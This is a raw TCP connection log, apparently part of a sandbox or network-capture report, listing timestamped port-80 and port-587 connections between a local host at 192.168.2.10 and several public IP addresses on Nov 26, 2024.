                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.645860910 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.645891905 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.767009020 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.767047882 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.734556913 CET805007234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.734597921 CET805007234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.735384941 CET5007280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.735481024 CET5007280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.855550051 CET805007234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.884680986 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.974289894 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.974342108 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.974459887 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.974508047 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.004764080 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.004865885 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.005057096 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.005088091 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.095282078 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.125041008 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.125050068 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.644458055 CET5007580192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.764535904 CET80500753.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.764630079 CET5007580192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.765094042 CET5007580192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.765120983 CET5007580192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.885143042 CET80500753.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.885154009 CET80500753.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.907496929 CET80500753.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.907562971 CET80500753.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.907618046 CET5007580192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.907700062 CET5007580192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.027729988 CET80500753.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108252048 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108421087 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108472109 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108525991 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.228559971 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.259082079 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379352093 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379440069 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379837036 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379878998 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.476978064 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.500494957 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.500571012 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597287893 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597377062 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597898960 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.598141909 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.718636036 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.718672037 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005498886 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005525112 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005595922 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005698919 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.125751972 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486525059 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486597061 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486643076 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486855984 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.567435980 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.606794119 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.640830994 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.687871933 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691400051 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691596031 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691596031 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.762419939 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.767318964 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.770020962 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.770020962 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.813127995 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.813297987 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.892498970 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.892507076 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122401953 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122422934 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122484922 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122915030 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207277060 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207325935 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207396030 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207545042 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.242825031 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.327595949 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.355633974 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.476661921 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.476815939 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.477217913 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.477241993 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.597220898 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.597496986 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.185609102 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.305999994 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306232929 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306483984 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306483984 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.426507950 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.426520109 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573230028 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573256016 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573416948 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.574062109 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.694071054 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.746217012 CET5008280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.866378069 CET805008218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.869461060 CET5008280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.124553919 CET5008280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.124608994 CET5008280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.244750977 CET805008218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.244780064 CET805008218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.569173098 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.572458029 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.572499037 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.692641973 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.692661047 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.975564957 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.091052055 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.237401009 CET805008218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.237447977 CET805008218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.241477966 CET5008280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.241844893 CET5008280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.361835003 CET805008218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.398080111 CET5008380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.518296003 CET80500833.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.518472910 CET5008380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.518590927 CET5008380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.518657923 CET5008380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.540184021 CET5008480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.638781071 CET80500833.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.638792992 CET80500833.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.660161018 CET805008447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.660258055 CET5008480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.660553932 CET5008480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.660553932 CET5008480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.780930996 CET805008447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.780944109 CET805008447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.002470970 CET80500833.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.002525091 CET80500833.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.002803087 CET5008380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.002872944 CET5008380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.123037100 CET80500833.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.152709007 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.272970915 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.273174047 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.278264046 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.278384924 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.399763107 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.399775982 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.717103004 CET805008447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.717139959 CET805008447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.717228889 CET5008480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.717582941 CET5008480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.837986946 CET805008447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.306807041 CET5008680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.426769972 CET805008634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.426894903 CET5008680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.427215099 CET5008680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.427236080 CET5008680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.549559116 CET805008634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.549578905 CET805008634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.713120937 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.720133066 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.720369101 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.840147972 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.840257883 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.275439024 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.389535904 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.427679062 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.547647953 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.547858953 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.548155069 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.548155069 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.668715954 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.668756962 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.828164101 CET805008634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.828289032 CET805008634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.828341961 CET5008680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.828388929 CET5008680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.948405027 CET805008634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.405960083 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.526063919 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.526262045 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.526561975 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.526582003 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.598660946 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.646498919 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.646522045 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.718780041 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.007237911 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.007781982 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.011327982 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.131999016 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.135459900 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606370926 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606463909 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606601000 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606767893 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.726855040 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.764528990 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.809992075 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.884840965 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885072947 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885222912 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885222912 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.930371046 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.930433035 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.005141973 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.005158901 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351233959 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351413965 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.473351955 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.540936947 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.541048050 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.541095972 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.541209936 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.661957979 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758491993 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758690119 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.878889084 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.123330116 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.163511038 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.165767908 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.241313934 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.243467093 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246682882 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246824980 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246824980 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.285731077 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.285932064 CET50092587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.335520029 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.335529089 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.339404106 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.339487076 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.361649990 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.363457918 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.366707087 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.366746902 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.406025887 CET5875009251.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.407603979 CET50092587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.459494114 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.495474100 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.615611076 CET805009347.129.31.212192.168.2.10
